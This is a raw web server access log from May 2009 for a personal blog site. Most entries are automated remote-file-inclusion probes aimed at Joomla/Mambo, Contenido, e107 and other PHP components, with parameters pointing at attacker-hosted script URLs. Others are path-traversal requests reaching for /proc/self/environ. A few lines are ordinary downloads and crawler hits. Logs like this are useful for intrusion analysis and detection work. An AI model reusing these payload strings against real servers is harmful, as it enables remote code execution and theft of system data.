208.38.181.51 - - [20/May/2009:10:59:59 -0700] "GET /logs//include/write.php?dir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.38.181.51 - - [20/May/2009:10:59:59 -0700] "GET /logs/access_080126.log//include/write.php?dir=http://saengcho.hs.kr/bbs//skin/zero_vote/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.98.226 - - [20/May/2009:11:00:09 -0700] "GET /logs/errors.php?error=http://www.proinex.cz/tmp/info.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.98.226 - - [20/May/2009:11:00:10 -0700] "GET /errors.php?error=http://www.proinex.cz/tmp/info.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.98.226 - - [20/May/2009:11:00:10 -0700] "GET /logs/access_081116.log/errors.php?error=http://www.proinex.cz/tmp/info.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.98.226 - - [20/May/2009:11:00:10 -0700] "GET /logs/access_080204.log/errors.php?error=http://www.proinex.cz/tmp/info.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:11:00:15 -0700] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:11:00:31 -0700] "GET /logs/access_090131.log%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:11:00:32 -0700] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:11:00:41 -0700] "GET /logs/access_090131.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:11:00:41 -0700] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:11:00:53 -0700] "GET /logs/access_080708.log%20%20//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:11:01:24 -0700] "GET /logs/access_080708.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:11:01:26 -0700] "GET /logs/access_080708.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:11:01:29 -0700] "GET /logs/access_090131.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.46.2.197 - - [20/May/2009:11:01:31 -0700] "GET /logs/access_080930.log//?option=com_philaform&Itemid=12&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.46.2.197 - - [20/May/2009:11:01:37 -0700] "GET /logs//?option=com_philaform&Itemid=12&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 200 100339 "-" "libwww-perl/5.803" "www.dmulk.com"
64.157.4.43 - - [20/May/2009:11:01:37 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.43 - - [20/May/2009:11:01:53 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
91.121.210.42 - - [20/May/2009:11:02:06 -0700] "GET /logs/access_090313.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://billiardshow.de/components/com_content/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
91.121.210.42 - - [20/May/2009:11:02:06 -0700] "GET /logs/access_081010.log%20%20//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://billiardshow.de/components/com_content/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.46.2.197 - - [20/May/2009:11:02:17 -0700] "GET /?option=com_philaform&Itemid=12&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 200 42107 "-" "libwww-perl/5.803" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:11:02:25 -0700] "GET /logs/access_080313.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:11:02:41 -0700] "GET /logs/access_090131.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:11:02:41 -0700] "GET /administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:11:02:44 -0700] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.46.2.197 - - [20/May/2009:11:03:01 -0700] "GET /logs/access_081204.log//?option=com_philaform&Itemid=12&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:11:03:13 -0700] "GET /logs/access_080708.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
85.214.98.226 - - [20/May/2009:11:03:43 -0700] "GET /logs/access_080410.log//modules/SPChat/images/12.php?teste=http://www.graal-plus.zp.ua//images/rox.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.98.226 - - [20/May/2009:11:03:43 -0700] "GET /modules/SPChat/images/12.php?teste=http://www.graal-plus.zp.ua//images/rox.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.98.226 - - [20/May/2009:11:03:44 -0700] "GET /logs//modules/SPChat/images/12.php?teste=http://www.graal-plus.zp.ua//images/rox.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.234.200.158 - - [20/May/2009:11:03:54 -0700] "GET /errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
200.234.200.158 - - [20/May/2009:11:03:54 -0700] "GET /logs/access_080511.log/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
200.234.200.158 - - [20/May/2009:11:03:54 -0700] "GET /logs/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
200.234.200.158 - - [20/May/2009:11:03:54 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
200.234.200.158 - - [20/May/2009:11:03:54 -0700] "GET /logs/access_080511.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
200.234.200.158 - - [20/May/2009:11:03:55 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
200.234.200.158 - - [20/May/2009:11:03:55 -0700] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
200.234.200.158 - - [20/May/2009:11:03:55 -0700] "GET /logs/access_080511.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
200.234.200.158 - - [20/May/2009:11:03:55 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
89.108.64.88 - - [20/May/2009:11:04:07 -0700] "GET /logs/access_081010.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.casualife.ru/logz.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.64.88 - - [20/May/2009:11:04:07 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.casualife.ru/logz.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.64.88 - - [20/May/2009:11:04:08 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.casualife.ru/logz.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.64.88 - - [20/May/2009:11:04:08 -0700] "GET /logs/access_090313.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.casualife.ru/logz.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.214.98.226 - - [20/May/2009:11:04:15 -0700] "GET /logs/access_080405.log//modules/SPChat/images/12.php?teste=http://www.graal-plus.zp.ua//images/rox.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.249.36.194 - - [20/May/2009:11:04:40 -0700] "GET /logs/access_080529.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://sherif-dudulz.ucoz.com/id1.txt????? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.231.24.38 - - [20/May/2009:11:04:40 -0700] "GET /logs/access_081230.log//e107/e107_handlers/secure_img_render.php?p=http://giffarine.co.th/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.231.24.38 - - [20/May/2009:11:04:40 -0700] "GET /logs/access_081230.log//e107/e107_handlers/secure_img_render.php?p=http://giffarine.co.th/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.231.24.38 - - [20/May/2009:11:04:41 -0700] "GET /e107/e107_handlers/secure_img_render.php?p=http://giffarine.co.th/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.231.24.38 - - [20/May/2009:11:04:41 -0700] "GET /e107/e107_handlers/secure_img_render.php?p=http://giffarine.co.th/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.231.24.38 - - [20/May/2009:11:04:42 -0700] "GET /logs//e107/e107_handlers/secure_img_render.php?p=http://giffarine.co.th/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.231.24.38 - - [20/May/2009:11:04:42 -0700] "GET /logs//e107/e107_handlers/secure_img_render.php?p=http://giffarine.co.th/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.46.2.197 - - [20/May/2009:11:04:59 -0700] "GET /logs/access_090119.log//?option=com_user&Itemid=312&mosConfig_absolute_path=http://www.gsmch.org/club/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:11:05:01 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:11:05:01 -0700] "GET /logs/access_081124.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:11:05:01 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:11:05:01 -0700] "GET /logs/access_080524.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:11:05:01 -0700] "GET /logs/access_081124.log/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:11:05:02 -0700] "GET /logs/access_080524.log/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:11:05:02 -0700] "GET /logs/access_081124.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:11:05:02 -0700] "GET /logs/access_080524.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:11:05:02 -0700] "GET /logs/access_081124.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:11:05:02 -0700] "GET /logs/access_080524.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:11:05:04 -0700] "GET /logs/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:11:05:05 -0700] "GET /errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:11:05:05 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:11:05:05 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:11:05:06 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
218.1.64.133 - - [20/May/2009:11:05:08 -0700] "GET /logs//components/com_sitemap/sitemap.php?mosConfig_admin_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
119.63.193.186 - - [20/May/2009:11:05:19 -0700] "GET /blog/wp-content/gallery/techstoc-2008/img_1013.jpg HTTP/1.1" 200 340617 "-" "BaiduImagespider+(+http://www.baidu.jp/spider/)" "dmulk.com"
65.23.154.225 - - [20/May/2009:11:05:25 -0700] "GET /logs/index.php?x=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
65.23.154.225 - - [20/May/2009:11:05:25 -0700] "GET /logs/access_080918.log/index.php?x=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
65.23.154.225 - - [20/May/2009:11:05:25 -0700] "GET /logs/access_080918.log/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
65.23.154.225 - - [20/May/2009:11:05:25 -0700] "GET /logs/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
65.23.154.225 - - [20/May/2009:11:05:25 -0700] "GET /logs/access_080918.log/index.php?x=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
65.23.154.225 - - [20/May/2009:11:05:26 -0700] "GET /logs/access_080918.log/index.php?x=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
65.23.154.225 - - [20/May/2009:11:05:26 -0700] "GET /logs/index.php?x=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
65.23.154.225 - - [20/May/2009:11:05:26 -0700] "GET /logs/index.php?x=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
64.157.4.42 - - [20/May/2009:11:05:27 -0700] "HEAD /blog/wp-cron.php?check=0e2d9f8f249ca15a02717d213606e9a2 HTTP/1.0" 200 0 "-" "WordPress/2.7.1" "dmulk.com"
64.157.4.42 - - [20/May/2009:11:05:28 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
65.23.154.225 - - [20/May/2009:11:05:40 -0700] "GET /errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
64.157.4.42 - - [20/May/2009:11:05:43 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
89.108.64.88 - - [20/May/2009:11:05:46 -0700] "GET /logs/access_081010.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.casualife.ru/logz.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
83.149.102.130 - - [20/May/2009:11:05:47 -0700] "GET /logs/access_080118.log%20%20//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.108.64.88 - - [20/May/2009:11:05:47 -0700] "GET /contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.casualife.ru/logz.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.64.88 - - [20/May/2009:11:05:48 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.casualife.ru/logz.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
89.108.64.88 - - [20/May/2009:11:05:48 -0700] "GET /logs/access_090313.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.casualife.ru/logz.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
217.155.120.238 - - [20/May/2009:11:05:51 -0700] "GET /logs/index.php?p=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
217.155.120.238 - - [20/May/2009:11:05:51 -0700] "GET /logs/access_070917.log/index.php?p=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
217.155.120.238 - - [20/May/2009:11:05:51 -0700] "GET /logs/access_070917.log/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
217.155.120.238 - - [20/May/2009:11:05:51 -0700] "GET /logs/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
217.155.120.238 - - [20/May/2009:11:05:52 -0700] "GET /logs/access_070917.log/index.php?p=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
217.155.120.238 - - [20/May/2009:11:05:52 -0700] "GET /logs/index.php?p=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
217.155.120.238 - - [20/May/2009:11:05:52 -0700] "GET /logs/access_070917.log/index.php?p=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
217.155.120.238 - - [20/May/2009:11:05:52 -0700] "GET /logs/index.php?p=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
222.231.24.38 - - [20/May/2009:11:05:53 -0700] "GET /logs/access_080520.log//index2.php?mosConfig_absolute_path=http://giffarine.co.th/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.157.4.42 - - [20/May/2009:11:05:55 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.41 - - [20/May/2009:11:05:55 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
222.231.24.38 - - [20/May/2009:11:05:59 -0700] "GET /index2.php?mosConfig_absolute_path=http://giffarine.co.th/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.234.200.158 - - [20/May/2009:11:05:59 -0700] "GET /logs/access_090121.log/errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
200.234.200.158 - - [20/May/2009:11:05:59 -0700] "GET /logs/access_090121.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
200.234.200.158 - - [20/May/2009:11:06:00 -0700] "GET /logs/access_090121.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "XXXXXX" "www.dmulk.com"
222.231.24.38 - - [20/May/2009:11:06:00 -0700] "GET /logs//index2.php?mosConfig_absolute_path=http://giffarine.co.th/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.23.154.225 - - [20/May/2009:11:06:00 -0700] "GET /index.php?x=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 500 292 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
222.231.24.38 - - [20/May/2009:11:06:03 -0700] "GET /logs/access_080520.log//index2.php?mosConfig_absolute_path=http://giffarine.co.th/includes/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.231.24.38 - - [20/May/2009:11:06:04 -0700] "GET /index2.php?mosConfig_absolute_path=http://giffarine.co.th/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.231.24.38 - - [20/May/2009:11:06:05 -0700] "GET /logs//index2.php?mosConfig_absolute_path=http://giffarine.co.th/includes/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.155.120.238 - - [20/May/2009:11:06:06 -0700] "GET /errors.php?error=http://www.longbeachphotosbc.ca/buggsbunny?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
